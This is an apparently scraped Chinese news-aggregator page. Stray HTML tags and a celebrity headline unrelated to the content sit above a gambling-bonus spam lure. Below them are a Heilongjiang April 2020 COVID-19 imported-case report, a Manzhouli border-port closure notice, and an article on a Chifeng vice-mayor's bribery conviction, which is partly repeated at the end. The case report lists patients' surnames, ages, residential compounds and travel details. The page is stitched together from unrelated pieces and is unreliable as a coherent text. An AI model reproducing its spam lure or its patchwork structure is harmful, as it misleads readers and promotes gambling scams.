1. <form id='416233'></form>
        <bdo id='576781'><sup id='709386'><div id='664191'><bdo id='452688'></bdo></div></sup></bdo>

          • 来源:中国新闻网
          • 周青主角的小说:葛荟婕否认汪峰赠歌:送我情歌的不止他

            时间:

            点击连接注册联系客服领取彩金 点击领取

            黑龙江新增俄罗斯输入25例 新增无症状感染者86例|||||||

            (原标题:最新疫情通报)

            2020年4月7日0-24时,黑龙江省省内无新增确诊病例,无新增疑似病例。省内现有无症状感染者2例(哈尔滨市五常市1例、七台河市勃利县1例)。当日发热门诊诊疗人数878人。

            2020年4月7日0-24时。全省新增境外治愈出院病例1例;新增境外输入重症病例2例;新增境外输入确诊病例25例(境外输入无症状感染者转为确诊病例4例),均为中国籍,从俄罗斯输入,其中:黑龙江省8例、吉林省7例、广东省7例、山东省2例、福建省1例。截至4月7日24时,累计报告境外输入确诊病例87例,其中:黑龙江省30例,其他省份57例;现有境外输入确诊病例86例;现有境外输入重病病例6例。追踪到境外密切接触者1015人,已解除医学观察328人,尚有687人正在接受医学观察。

            2020年4月7日0-24时,新增境外输入无症状感染者86例,均为中国籍,从俄罗斯输入,其中:广东省23例、吉林省22例、黑龙江省21例、辽宁省3例、山东省3例、福建省3例、天津市2例、江苏省2例、江西省2例、四川省1例、安徽省1例、浙江省1例、广西壮族自治区1例、重庆市1例。截至4月7日24时,现有境外输入无症状感染者144例,其中:黑龙江省55例,其他省份89例。

            新增25例境外输入病例有关情况

            病例1:

            尹某,男,45岁,中国籍,常住地:山东省日照市东港区海曲西路安泰易居。

            2020年4月3日20时30分,乘坐SU1702Z航班,由莫斯科至符拉迪沃斯托克。

            4月4日,乘大巴到达绥芬河口岸联检大厅,绥芬河海关综合技术中心实验室核酸检测阳性。

            4月5日,经牡丹江市疾控中心实验室复核,核酸检测结果呈阳性,当晚转入绥芬河市人民医院隔离治疗。

            4月7日,经省、市专家会诊,诊断为新型冠状病毒肺炎确诊病例。

            目前该患所有同乘回国人员均按照有关规定集中隔离观察。无中国境内密切接触者。

            病例2:

            张某,女,47岁,中国籍,常住地:山东省日照市东港区海曲西路安泰易居。

            2020年4月3日20时30分,乘坐SU1702Z航班,由莫斯科至符拉迪沃斯托克,座位号。

            4月4日,乘大巴到达绥芬河口岸联检大厅,绥芬河海关综合技术中心实验室核酸检测阳性。

            4月5日,经牡丹江市疾控中心实验室复核,核酸检测结果呈阳性,当晚转入绥芬河市人民医院隔离治疗。

            4月7日,经省、市专家会诊,诊断为新型冠状病毒肺炎确诊病例。

            目前该患所有同乘回国人员均按照有关规定集中隔离观察。无中国境内密切接触者。

            病例3:

            张某,男,25岁,中国籍,常住地:广东省汕头市朝南区仙城镇。

            2020年4月3日15时40分,乘坐 SU1700B 航班由莫斯科至符拉迪沃斯托克。

            4月4日,乘大巴到达绥芬河口岸联检大厅,绥芬河海关综合技术中心实验室核酸检测阳性。

            4月5日,经牡丹江市疾控中心实验室复核,核酸检测结果呈阳性,当晚转入绥芬河市人民医院隔离治疗。

            4月7日,经省、市专家会诊,诊断为新型冠状病毒肺炎确诊病例。

            目前该患所有同乘回国人员均按照有关规定集中隔离观察。无中国境内密切接触者。

            病例4:

            孙某,女,45岁,中国籍,常住地:黑龙江省密山市光复路。

            3月31日,从莫斯科乘坐 SU1700次航班至符拉迪沃斯托克。

            4月1日,从符拉迪沃斯托克途经乌苏里斯克至绥芬河口岸界碑处。

            4月1日,绥芬河海关综合技术中心实验室核酸检测阳性,经牡丹江市疾控中心实验室复核,核酸检测结果呈阳性。

            4月2日,转运至牡丹江康安医院隔离治疗。

            4月7日,经专家会诊,诊断为新型冠状病毒肺炎确诊病例。

            病例5:

            翁某,女,38岁,中国籍,常住地:广东省汕头市潮南区红场镇。

            4月3日,乘坐SU1700航班从莫斯科前往符拉迪沃斯托克。

            4月4日,乘车牌AB760汽车从符拉迪沃斯托克前至绥芬河口岸联检大厅,随后乘坐转运车至绥芬河市世茂酒店隔离。

            4月5日,患者新冠病毒核酸检测阳性,患者胸片有改变,遂将患者送往绥芬河市人民医院隔离治疗。

            4月7日,经专家会诊,诊断为新冠肺炎确诊病例。

            该患者所有同乘回国人员均按照有关规定集中隔离观察。无中国境内密切接触者。

            病例6:

            严某,男,22岁,中国籍,常住地:福建省福州市福清市江阴镇。

            4月3日,乘坐SU1702航班从莫斯科前往符拉迪沃斯托克。

            4月4日,乘汽车由符拉迪沃斯托克至戈城海关,后乘汽车由戈城海关至绥芬河口岸联检大厅,当天转运至绥芬河市人民医院集中隔离。

            4月5日,患者新型冠状病毒核酸检测阳性,患者胸片有改变。

            4月7日,经专家会诊,诊断为新型冠状病毒肺炎确诊病例。

            该患者所有同乘回国人员均按照有关规定集中隔离观察。无中国境内密切接触者。

            病例7:

            陈某,男,37岁,中国籍,常住地:广东省汕头市潮南区两英镇。

            4月3日,乘坐SU1700航班从莫斯科至符拉迪沃斯托克。

            4月4日,乘汽车(车牌号AB228)从符拉迪沃斯托克前往绥芬河口岸界碑处入境,后坐绥芬河大巴3号车至口岸联检大厅,当天转运至世茂大酒店集中隔离。

            4月5日,患者新型冠状病毒核酸检测阳性。胸片有改变,遂将患者送往绥芬河市人民医院隔离治疗。

            4月7日,经专家会诊,诊断为新型冠状病毒肺炎确诊病例。

            该患者所有同乘回国人员均按照有关规定集中隔离观察。无中国境内密切接触者。

            病例8:

            陈某,男,29岁,中国籍,常住地:广东省汕头市朝南区陈店镇。

            4月3日,乘坐SU1700航班从莫斯科至符拉迪沃斯托克。

            4月4日,乘汽车(车牌号AB228)从符拉迪沃斯托克前往绥芬河口岸界碑处入境,后坐绥芬河大巴3号车至口岸联检大厅,当天转运至世茂大酒店集中隔离。

            4月5日,患者新型冠状病毒核酸检测阳性。患者有寒战、干咳、流涕,胸片改变,遂将患者送往绥芬河市人民医院隔离治疗。

            4月7日,经专家会诊,诊断为新型冠状病毒肺炎确诊病例。

            该患者所有同乘回国人员均按照有关规定集中隔离观察。无中国境内密切接触者。

            病例9:

            陈某,男,47岁,中国籍,常住地:广东省汕头市潮南区陈店镇。

            4月3日,乘坐SU1700航班从莫斯科前往符拉迪沃斯托克。

            4月4日,乘汽车(车牌号670)从符拉迪沃斯托克前往绥芬河口岸界碑处入境,后坐绥芬河大巴12号车至口岸联检大厅,当天转运至富邦酒店集中隔离。

            4月5日,患者新型冠状病毒核酸检测阳性。胸片有改变,遂将患者送往绥芬河市人民医院隔离治疗。

            4月7日,经专家会诊,诊断为新型冠状病毒肺炎确诊病例。

            该患者所有同乘回国人员均按照有关规定集中隔离观察。无中国境内密切接触者。

            病例10:

            刘某,男,30岁,中国籍,常住地:吉林省舒兰市三道街民康家园。

            4月3日,乘坐SU1700航班从莫斯科至符拉迪沃斯托克。

            4月4日,乘AB760号牌客车至绥芬河口岸界碑处,后乘坐中国3号大巴到达绥芬河口岸联检大厅。

            4月4日,患者新型冠状病毒核酸检测阳性,立即转到绥芬河市人民医院隔离治疗。

            4月7日,经专家会诊,诊断为新型冠状病毒肺炎确诊病例。

            该患者所有同乘回国人员均按照有关规定集中隔离观察。无中国境内密切接触者。

            病例11:

            孙某,女,36岁,中国籍,常住地:吉林省舒兰市中央公馆。

            4月3日,乘坐SU1702航班至符拉迪沃斯托克。

            4月4日,乘AB834号牌客车至绥芬河口岸界碑处,后乘坐中国3号大巴到达绥芬河口岸联检大厅。

            4月4日,患者新型冠状病毒核酸检测阳性,立即转到绥芬河市人民医院隔离治疗。

            4月7日,经专家会诊,诊断为新型冠状病毒肺炎确诊病例。

            该患者所有同乘回国人员均按照有关规定集中隔离观察。无中国境内密切接触者。

            病例12:

            孟某,女,44岁,中国籍,常住地:吉林省舒兰市小城镇。

            4月1日下午15:40乘坐SU1700次航班由莫斯科出发,于4月2日早6时到达符拉迪沃斯托克。

            4月2日早8时从符拉迪沃斯托克出发,乘汽车AB232至绥芬河口岸界碑处入境;随后乘坐绥芬河大巴A号大巴于13时到达绥芬河口岸联检大厅。转运至绥芬河市世贸大厅集中隔离观察。

            4月3日,患者新型冠状病毒核酸检测阳性,由120救护车转运至牡丹江市康安医院进行隔离治疗。

            4月7日,经专家会诊,诊断为新型冠状病毒肺炎确诊病例。

            该患者所有同乘回国人员均按照有关规定集中隔离观察。无中国境内密切接触者。

            病例13:

            李某,女,32岁,中国籍,常住地:吉林省舒兰市冰河小区。

            4月3日,乘坐SU1700航班从莫斯科前往符拉迪沃斯托克。

            4月4日,乘汽车从符拉迪沃斯托克前往绥芬河口岸界碑处入境,后乘坐绥芬河大巴车至口岸联检大厅。当天转运至隔离点集中隔离。

            4月4日,患者新型冠状病毒核酸检测阳性。

            4月5日,经牡丹江市疾控中心实验室复核,核酸检测结果呈阳性,当晚转入绥芬河市人民医院隔离治疗。

            4月7日,经专家会诊,诊断为新型冠状病毒肺炎确诊病例。

            该患者所有同乘回国人员均按照有关规定集中隔离观察。无中国境内密切接触者。

            病例14:

            林某,男,25岁,中国籍,常住地:广东省揭阳市惠来县隆江镇。

            4月3日,乘坐SU1700航班从莫斯科前往符拉迪沃斯托克。

            4月4日,乘汽车(车牌号AB232)从符拉迪沃斯托克前往绥芬河口岸界碑处入境,后乘坐绥芬河大巴车至口岸联检大厅。当天转运至吉云酒店集中隔离。

            4月4日,患者新型冠状病毒核酸检测阳性。

            4月5日,经牡丹江市疾控中心实验室复核,核酸检测结果呈阳性,当晚转入绥芬河市人民医院隔离治疗。

            4月7日11时,经专家会诊,诊断为新型冠状病毒肺炎确诊病例。

            该患者所有同乘回国人员均按照有关规定集中隔离观察。无中国境内密切接触者。

            病例15:

            范某,男,37岁,中国籍,常住地:黑龙江省齐齐哈尔市富裕县富裕镇。

            4月3日,乘坐SU1700航班从莫斯科前往符拉迪沃斯托克。

            4月4日,乘汽车(车牌号AB232)从符拉迪沃斯托克前往绥芬河口岸界碑处入境,后乘坐绥芬河大巴3号车至口岸联检大厅。当天转运至绥芬河市集中隔离点。

            4月4日,患者新型冠状病毒核酸检测阳性。

            4月5日,经牡丹江市疾控中心实验室复核,核酸检测结果阳性,当晚将患者转运至绥芬河市人民医院隔离治疗。

            4月6日,经专家会诊,诊断为新型冠状病毒肺炎确诊病例。

            该患者所有同乘回国人员均按照有关规定集中隔离观察。无中国境内密切接触者。

            病例16:

            崔某,女,38岁,中国籍,常住地:黑龙江省牡丹江市西安区西二条路联发小区。

            4月3日,乘坐SU1700航班从莫斯科前往符拉迪沃斯托克。

            4月4日,乘汽车(车牌号AB232)从符拉迪沃斯托克前往绥芬河口岸界碑处入境,后坐绥芬河大巴3号车至口岸联检大厅。当天转运至绥芬河市集中隔离点。

            4月4日,患者新型冠状病毒核酸检测阳性。

            4月5日,经牡丹江市疾控中心实验室复核,核酸检测结果阳性,当晚将患者送往绥芬河市人民医院隔离治疗。

            4月6日,经专家会诊,诊断为新型冠状病毒肺炎确诊病例。

            该患者所有同乘回国人员均按照有关规定集中隔离观察。无中国境内密切接触者。

            病例17:

            张某,性别:女,33岁,中国籍,常住地:吉林省舒兰市小城镇。

            3月29日,从俄罗斯乘坐 SU1700次航班到符拉迪沃斯托克。

            3月30日,从符拉迪沃斯托克途经俄罗斯乌苏里至绥芬河口岸界碑处。转运至绥芬河市云崴商务宾馆进行集中隔离。

            4月6日,乘坐大巴(黑AG5726)从绥芬河转运至穆棱市奥鑫宾馆进行集中隔离。

            4月7日,经牡丹江市疾控中心检测,核酸检测结果为阳性。当天转运至绥芬河人民医院隔离治疗。

            4月7日,经专家会诊,诊断为新型冠状病毒肺炎确诊病例。

            该患者所有同乘回国人员均按照有关规定集中隔离观察。无中国境内密切接触者。

            病例18:

            张某,性别:男,34岁,中国籍,常住地:黑龙江省鹤岗市兴安区红旗乡。

            4月3日,从莫斯科乘坐 SU1700次航班到符拉迪沃斯托克。

            4月3日,从符拉迪沃斯托克途经乌苏里斯克至绥芬河口岸界碑处(车号232)。

            4月4日,被转运车转送至牡丹江市集中隔离点维也纳智好酒店隔离。

            4月6日,经牡丹江疾控中心检测,核酸检测结果为阳性。转运至康安医院隔离治疗。

            4月7日,经专家会诊,诊断为新型冠状病毒肺炎确诊病例。

            该患者所有同乘回国人员均按照有关规定集中隔离观察。无中国境内密切接触者。

            病例19:

            任某,男,42岁,中国籍,常住地:黑龙江省绥芬河市溪树庭院。

            4月3日,乘坐SU1700航班从莫斯科至符拉迪沃斯托克。

            4月4日,乘汽车(车次不详)从符拉迪沃斯托克前往绥芬河口岸界碑处入境,后乘8号大巴车至口岸联检大厅。当天转运至世贸大厅集中隔离。

            4月5日,患者新型冠状病毒核酸检测阳性,遂将患者转运至绥芬河市人民医院隔离治疗。

            4月7日,经专家会诊,诊断为新型冠状病毒肺炎确诊病例。

            该患者所有同乘回国人员均按照有关规定集中隔离观察。无中国境内密切接触者。

            病例20:

            郭某,女,50岁,中国籍,常住地:黑龙江省穆棱林业局东升小区。

            3月31日,乘坐SU1700航班从莫斯科至符拉迪沃斯托克。

            4月1日,乘汽车(车牌号AB228)从符拉迪沃斯托克前往绥芬河口岸界碑处入境,后乘坐绥芬河1号大巴车至口岸联检大厅。当天转运至世贸大厅集中隔离。

            4月2日,患者新型冠状病毒核酸检测阳性,转运至康安医院隔离治疗。

            4月7日,经专家会诊,诊断为新型冠状病毒肺炎确诊病例。

            该患者所有同乘回国人员均按照有关规定集中隔离观察。无中国境内密切接触者。

            病例21:

            卢某,男,24岁,中国籍,常住地:广东省汕头市朝阳区贵屿镇。

            4月3日,乘坐SU1700航班从莫斯科前往符拉迪沃斯托克。

            4月4日,乘汽车(车牌号AB198)从符拉迪沃斯托克前往绥芬河口岸界碑处入境,后乘坐绥芬河8号大巴车至口岸联检大厅。当天转运至世贸大厅集中隔离。

            4月5日,患者新型冠状病毒核酸检测阳性,遂将患者转运至绥芬河市人民医院隔离治疗。

            4月7日,经专家会诊,诊断为新型冠状病毒肺炎确诊病例。

            该患者所有同乘回国人员均按照有关规定集中隔离观察。无中国境内密切接触者。

            病例22:

            王某,女,42岁,中国籍,常住地:吉林省舒兰市庆丰乡。

            4月3日,乘坐SU1700航班从莫斯科前往符拉迪沃斯托克。

            4月4日,乘汽车(车牌号不详)从符拉迪沃斯托克前往绥芬河口岸界碑处入境,后乘坐绥芬河大巴车至口岸联检大厅。当天转运至绥芬河世贸大厅隔离。

            4月5日,患者新型冠状病毒核酸检测阳性,遂将患者转运至绥芬河市人民医院隔离治疗。

            4月7日,经专家会诊,诊断为新型冠状病毒肺炎确诊病例。

            该患者所有同乘回国人员均按照有关规定集中隔离观察。无中国境内密切接触者。

            病例23:

            张某,男,42岁,中国籍,常住地:吉林省舒兰市建新园。

            4月3日,乘坐SU1700航班从莫斯科至符拉迪沃斯托克。

            4月4日,乘AB232汽车从符拉迪沃斯托克前往绥芬河口岸界碑处入境,后乘坐绥芬河大巴车至口岸联检大厅。当天转运至绥芬河市人民医院隔离。

            4月5日,患者新型冠状病毒核酸检测阳性。

            4月6日,经专家会诊,诊断为新型冠状病毒肺炎确诊病例。

            该患者所有同乘回国人员均按照有关规定集中隔离观察。无中国境内密切接触者。

            病例24:

            韩某,男,46岁,中国籍,常住地:黑龙江省大兴安岭地区呼玛县祥和小区。

            4月3日,从莫斯科乘坐 SU1700次航班到符拉迪沃斯托克。

            4月4日,从符拉迪沃斯托克途经乌苏里斯克至绥芬河口岸界碑处。乘坐中国大巴到达口岸联检大厅,转运至六大秘书处隔离点集中隔离。患者新型冠状病毒核酸检测阳性。

            4月6日,因出现发热症状,送至绥芬河市人民医院发热门诊,因病情较重当晚转送至牡丹江市红旗医院隔离治疗。

            4月7日10时,经专家会诊,诊断为新型冠状病毒肺炎确诊病例。

            该患者所有同乘回国人员均按照有关规定集中隔离观察。无中国境内密切接触者。

            病例25:

            盛某,男,17岁,中国籍,常住地:黑龙江省绥化市绥棱县清华家园。

            4月3日,乘坐SU1700航班从莫斯科前往符拉迪沃斯托克。

            4月4日,乘汽车(车牌号AB232)从符拉迪沃斯托克前往绥芬河口岸界碑处入境,后乘坐绥芬河2号大巴车至口岸联检大厅。

            4月5日,患者新型冠状病毒核酸检测阳性,遂将患者送往绥芬河市人民医院隔离治疗。

            4月7日,经专家会诊,诊断为新型冠状病毒肺炎确诊病例。

            该患者所有同乘回国人员均按照有关规定集中隔离观察。无中国境内密切接触者。

            新增境外输入无症状感染者86例有关情况

            4月4日,李某某、范某等79名无症状感染者分别乘俄航SU1700航班、SU1702航班自莫斯科直飞符拉迪沃斯托克,于次日乘坐大巴到达绥芬河公路口岸。4月5日,经绥芬河市疾控中心检测,结果为新冠病毒核酸阳性,4月7日经专家组诊断,判定为新冠病毒无症状感染者,目前已进行集中隔离医学观察。

            4月5日,王某等6名无症状感染者乘俄航SU1700航班自莫斯科直飞符拉迪沃斯托克,于次日乘大巴到达绥芬河公路口岸。4月6日,经绥芬河市疾控中心检测,结果为新冠病毒核酸阳性,4月7日经专家组诊断,判定为新冠病毒无症状感染者,目前已进行集中隔离医学观察。

            吴某某,男,48岁,中国籍,货车司机,常住地:黑龙江省牡丹江市东宁市水岸明珠。

            3月26日,拉果菜出境,当晚在乌苏里斯克入住旅店。

            3月28日返回入境,自己货车上住一宿。

            3月29日上午,开K9138轿车往返三岔口泡子沿,下午独自入住东宁市温州宾馆(入境货车司机集中管控点)。

            3月30日,开自家车到口岸换货车出境。

            4月1-2日返回入境后开自家车回到东宁红城宾馆(入境货车司机集中管控点)。

            4月3日,坐政府安排专用车到三岔口口岸后独自开货车出境。

            4月4日,返回入境,再坐指定专用出租车返回入住红城宾馆(入境货车司机集中管控点)。

            4月5日,坐指定专用出租车到口岸出境,在俄罗斯乌苏里旅店住宿。

            4月6日,返回入境,120救护车接到东宁市结核病防治所隔离观察。

            吴某某于4月1日入境东宁口岸海关采样,6日反馈核酸检测结果呈弱阳性。4月6日入境于东宁口岸二次核酸检测呈阴性。4月7日,经牡丹江市疾控中心核酸检测,结果呈阳性。当日转送到绥芬河市人民医院隔离治疗。经流行病学调查,其29名密切接触者已全部集中隔离医学观察。

            延伸阅读 中使馆:张静静丈夫回国已有初步方案 正细化落实 外国人在华受歧视、中国排外情绪上升?外交部回应 总领馆发布提醒:中国公民切勿通过绥芬河口岸回国 荀建国 本文来源:黑龙江省卫生健康委员会 责任编辑:荀建国_NN7379

            满洲里临时关闭至俄罗斯后贝加尔斯克公路口岸|||||||

            (原标题:满洲里临时关闭至俄罗斯后贝加尔斯克公路口岸)

            【满洲里临时关闭至俄罗斯后贝加尔斯克公路口岸】4月8日,记者从内蒙古自治区满洲里市获悉,内蒙古自治区口岸管理办公室致函俄联邦边界建设署赤塔分局、俄罗斯外贝加尔边疆区投资发展部。鉴于目前满洲里公路口岸入境人员骤增,口岸检验检疫能力和市区隔离检测能力已超过极限的情况,满洲里――后贝加尔斯克公路口岸客运通道于4月8日20:00临时关闭,恢复开关日期另行公告。

            盛雨晴 本文来源:人民日报 作者:张枨 责任编辑:盛雨晴_NBJS10200

            干部16年受贿1200余万 教授妻子成其受贿"后门"|||||||

            (原标题:儿子当官老子沾光 丈夫办事妻子收钱)

            内蒙古自治区赤峰市原副市长于文涛因犯受贿罪、私分国有资产罪、巨额财产来源不明罪被判处有期徒刑十年零六个月。他对送来的钱来者不拒、一概笑纳,仅查明的受贿金额就高达1200余万元,他的所作所为也深深地影响了家里人――

            丈夫16年受贿1200余万!大学教授成其受贿后门

            于文涛受审

            从2002年到2018年,在长达16年的受贿历程中,于文涛五千一万不嫌少,百八十万不嫌多地笔笔“笑纳”。“千里之堤,溃于蚁穴”,于文涛思想的堤坝,就这样被一次次的“感谢”腐蚀着,逐渐陷入公权与私利的交换游戏中。虽然于文涛有自首、坦白情节,且认罪悔罪,并退缴了大部分赃款赃物,但这一切也只是亡羊补牢,悔之晚矣……

            前不久,经内蒙古自治区巴彦淖尔市检察院向巴彦淖尔市中级法院提起公诉,内蒙古自治区赤峰市政府原党组成员、副市长于文涛(副厅级)受贿、私分国有资产、巨额财产来源不明案一审公开宣判。法院认定于文涛犯受贿罪、私分国有资产罪、巨额财产来源不明罪,数罪并罚,决定合并执行有期徒刑十年零六个月,并处罚金100万元。

            法院经审理查明:于文涛身为国家机关工作人员,利用其担任赤峰市喀喇沁旗旗长、旗委书记,赤峰市财政局党组书记、局长,赤峰市政府党组成员、副市长的职务便利,或其职权地位形成的便利条件,接受他人请托,为他人谋取利益,收受他人财物共计价值约1267万元人民币和4.5万元美元;违反国家规定,以单位名义用国有资产支付职工家属楼土地使用权转让金1800万元。于文涛身为国家机关工作人员,家庭财产、支出明显超过合法收入,责令其说明来源,仍有650余万元人民币、12.98余万元美元、9765元欧元、12万元港币和14.4万元日元不能说明来源。

            1.从讲坛到政坛,贪欲之门悄然打开

            于文涛出生于1961年6月,是土生土长的赤峰人。1988年,于文涛从赤峰市第二中学团委书记的岗位调到了共青团赤峰市委员会学少部任青工农牧部部长。从此,开始了他的仕途生涯。2002年,于文涛自担任赤峰市喀喇沁旗旗长后,便拉开了利用职务便利疯狂敛财的序幕。

            在长达16年的时间里,春节、端午节、劳动节、中秋节,节日都是他受贿的时机;办公室、家里、饭店,甚至出差开会到呼和浩特、北京,都是他受贿的地点;孩子结婚、妻子生病、父亲去世,都是他受贿的理由。

            尤其是在2005年至2012年,于文涛担任赤峰市财政局局长期间,更是大肆收受贿赂。在这段时间里,无论是其下属旗县区财政局,还是需要财政拨款的单位,都成为其受贿的对象。他不仅收前任的还收现任的,不仅收在职的还收离职的,在当地财政系统的影响非常恶劣。

            从2002年至2013年,某下属单位为得到于文涛在项目、拨款方面的支持与帮助,先后30余次在于文涛办公室行贿,共计送给于文涛79万元现金。之后,于文涛在资金拨付与项目争取方面,都给了该单位较大的倾斜力度。仅2011年一年,该下属单位主要领导就专程看望于文涛6次,先后送出现金13万元,平均每两个月就要来“感谢”一下于文涛的照顾。

            当时,一些房地产开发商、企业经营者是主要行贿人,他们的目的无非是希望于文涛在相关项目的税款收缴、工程招投标、工程款支付等方面给予关照。

            2012年3月,于文涛仕途再上一步,担任赤峰市副市长。他分管教育、国土资源、住房和城乡建设等工作,在项目审批、土地规划、施工计划调整上手握大权。权力的增大,也让于文涛在自我毁灭的道路上越走越远。

            2013年,赤峰某房地产开发公司计划开发赤峰市松山区某工程项目,在向规划局报批时,因为遮挡北侧居民采光而未被通过。该公司法定代表人给时任赤峰市副市长的于文涛送了10万元现金。在对项目规划进行微调后,上报审批顺利通过。2013年至2017年间,于文涛利用职务便利,为该公司在项目规划和开发方面多次提供帮助,并先后三次收受该公司现金共计40万元。

            在2014年至2017年间,赤峰某建材化工企业董事长为了让于文涛帮助推进工程项目、尽快获得政府补贴款、重新补办规划手续等事项,先后4次拿着蓝白相间的编织袋来到于文涛家楼下,共计送上100万元现金。吃人嘴软、拿人手短,收钱后的于文涛尽心尽力地一项项完成了行贿人的请托事项。

            2.从推辞到伸手,欲望的口子越开越大

            16年来,无休止的贪欲驱使于文涛陷入利令智昏的怪圈。他从受贿时冠冕堂皇地推辞两句,逐渐演变为向有求于他的企业和单位频频暗示。他把权力当作捞取钱财、积累财富的工具。

            2002年春节前,时任喀喇沁旗旗长的于文涛在自己办公室里提点某下属单位负责人说:“快过春节了,为了方便以后好办事,应该去看看市里的领导和相关部门领导。”该单位负责人一听豁然开朗,马上回单位拿了10万元现金,回到于文涛的办公室,将这10万元放到他的办公桌上。于文涛会意地把钱收下。

            2011年,于文涛向某下属单位负责人杨某表示,想在热水汤温泉城给老爷子(于文涛的父亲)买一处房子。杨某心领神会,找到该楼盘的开发商买下一处70多平方米的房子。随后,杨某又让办公室主任购置了电视机、电冰箱、洗衣机、电磁炉等家用电器。2011年末的一天,杨某来到于文涛家,将新房钥匙交给他。2012年3月,杨某又去热水汤温泉城售楼处选好车库位置,交清了6万元车库款后,把车库钥匙交给了于文涛。

            2014年,于文涛发现自己在赤峰市天骄西苑东区的房子卫生间的门对着卧室的床,感觉影响了风水。于是,他找到某建筑设计集团的董事长“帮忙看看”。该董事长立即找来技术人员,并派人对房间进行了维修改造。2016年7月,于文涛又找到该董事长,说他儿子在富兴嘉城的房子要装修,问能不能给提供点材料。经该董事长安排,这家企业先后给于文涛儿子200多平方米的房子提供了木门、整体橱柜、电器等,共计花费26.32万元。2013年至2018年期间,于文涛还通过该董事长收受了这家企业25万元人民币,5000美元和价值人民币5000元的众联购物卡一张。

            于文涛不仅用权力交换利益,而且滥用权力,侵蚀公款。

            2005年4月,赤峰市财政局经研究决定建造财政局职工住宅楼。同年4月12日,财政局与赤峰市某房地产开发有限责任公司签订了合同标的为1800万元的土地使用权转让协议书,该土地用于职工集资建房。2005年4月30日和5月9日,财政局从国库借用预算外资金分别向该公司支付1500万元和300万元土地使用权转让金。

            2005年4月30日,于文涛经赤峰市委决定被任命为赤峰市财政局党组书记。同年5月中旬,于文涛到任后,决定以支付财政局办公楼工程款的形式套取资金,归还财政局用国库预算外资金垫付的1800万元土地使用权转让金。

            2005年12月至2006年8月,于文涛决定,赤峰市财政局以支付办公楼工程款名义向办公楼承建公司转账2262万元,该公司将其中2220万元通过其关联公司全部取现返还给财政局,财政局将其中的1800万元归还国库,另420万元用于其他公务支出。后经于文涛决定,由赤峰市财政局财务人员虚构2220万元职工购房款收入做平账目。

            3.从自己收到全家收,“家族式腐败”愈演愈烈

            慢慢地,于文涛变得自我膨胀起来,廉政底线彻底失守,全然不知“廉耻”二字。他认为给别人办事,别人“感谢”他是应该的,人情礼送一律来者不拒、一概笑纳。于文涛的所作所为也深深地影响了家里人,“家族式腐败”陆续上演。

            2005年,于文涛任赤峰市财政局局长,他的父亲于某到喀喇沁旗游玩,吃住在喀喇沁旗财政局小宾馆,还让喀喇沁旗财政局局长张某给他找个司机,说要练习开车。过了一段时间,于某又去喀喇沁旗游玩,又让张某给借个车。2006年,于某第三次到喀喇沁旗游玩,又和张某提出借车的事。这一回,于某看起来很不高兴。张某冥思苦想,推断于某不是想借车,而是想要车。张某不禁左右为难,于文涛是赤峰市财政局局长,自己在于文涛直接管理的下属单位工作,如果不给于某购车,恐怕会处理不好和于文涛的关系,进而影响工作。张某最终拿出25万元人民币购买了一台本田轿车,并将车过户到于某名下,又将新车开到了于某居住的小区,将车钥匙交给于某。当然,购车的费用并不是张某兜里的钱,而是喀喇沁旗财政局在经费中虚列的招待费。

            于文涛的妻子王某在赤峰学院工作,是一名受人尊敬的大学教授。但是在利益面前,王某同样没能守住自己的原则和底线,变得唯利是图。作为领导干部的妻子,她没有吹好“枕边风”,当好“廉内助”,反而成了丈夫受贿的“后门”。

            2009年春节前,郭某为感谢于文涛在工作上对自己和丈夫的支持,专门给于文涛打电话说要去串个门。于文涛当时不在家,让郭某跟妻子王某联系。郭某去时买了一束鲜花,还带上了提前准备好的用报纸包着的10万元现金。在于文涛家,郭某客气地对王某说:“王教授,过年了,于局长对我和我老公都挺支持的,也不知道你缺啥,你自己买点东西吧。”王某看着手提纸袋明知故问道:“这是啥?”郭某回答说:“我给你们拿的钱。”王某客气了几句,就收下了这些钱。2006年至2017年间,于文涛先后多次单独收受或伙同妻子王某收受郭某现金共计50万元。

            于文涛从一名人民教师逐步走上了党政机关领导岗位。他以为天下熙熙,皆为利来;天下攘攘,皆为利往,在一次又一次的学习教育中,没有警醒与反思,反而越来越深地陷入了贪欲的泥淖,本已临近退休的他只能在监狱中慢慢地吞下自己种的苦果。

            ◎检察长说案

            良好家风是抵御贪腐“防火墙”

            丈夫16年受贿1200余万!大学教授成其受贿后门

            内蒙古自治区巴彦淖尔市检察院党组书记、检察长 张复弛

            2019年12月23日,内蒙古自治区赤峰市原副市长于文涛受贿、私分国有资产、巨额财产来源不明案在巴彦淖尔市中级法院公开宣判,判决全部采纳了巴彦淖尔市检察院指控的事实与罪名,并采纳了检察官提出的量刑建议。

            纵观于文涛的犯罪历程,他通过自身努力从一名人民教师逐步走上了党政机关领导岗位,作为党的执政骨干,本应发挥“关键少数”的示范引领作用,以身作则、从严律己。但是,他却将手中的权力当成“摇钱树”。从政30年间,收受巨额财物,严重破坏了当地的政治生态。于文涛案有受贿周期长、受贿对象广、涉及罪名多、犯罪数额大等特点。思想上的松懈、道德上的滑坡、作风上的堕落固然是其沦为阶下囚的主要原因,但其不良的家风也是重要诱因。良好的家风是抵御贪腐的“防火墙”。正如习近平总书记多次强调的:“领导干部要把家风建设摆在重要位置,廉洁修身、廉洁齐家。”

            于文涛案警示所有党员干部,要坚守政治信仰、增强法治观念、遵循道德信仰,常思手中的权力从何而来,为谁而用。欲治其国者,先齐其家,广大党员干部一定要切实提高个人党性修养,明晰底线红线,重视道德家风,筑牢抵御贪腐的思想道德防线。

            荀建国 本文来源:检察日报 责任编辑:荀建国_NN7379

            1.干部16年受贿1200余万 教授妻子成其受贿"后门"|||||||

            (原标题:儿子当官老子沾光 丈夫办事妻子收钱)

            内蒙古自治区赤峰市原副市长于文涛因犯受贿罪、私分国有资产罪、巨额财产来源不明罪被判处有期徒刑十年零六个月。他对送来的钱来者不拒、一概笑纳,仅查明的受贿金额就高达1200余万元,他的所作所为也深深地影响了家里人――

            丈夫16年受贿1200余万!大学教授成其受贿后门

            于文涛受审

            从2002年到2018年,在长达16年的受贿历程中,于文涛五千一万不嫌少,百八十万不嫌多地笔笔“笑纳”。“千里之堤,溃于蚁穴”,于文涛思想的堤坝,就这样被一次次的“感谢”腐蚀着,逐渐陷入公权与私利的交换游戏中。虽然于文涛有自首、坦白情节,且认罪悔罪,并退缴了大部分赃款赃物,但这一切也只是亡羊补牢,悔之晚矣……

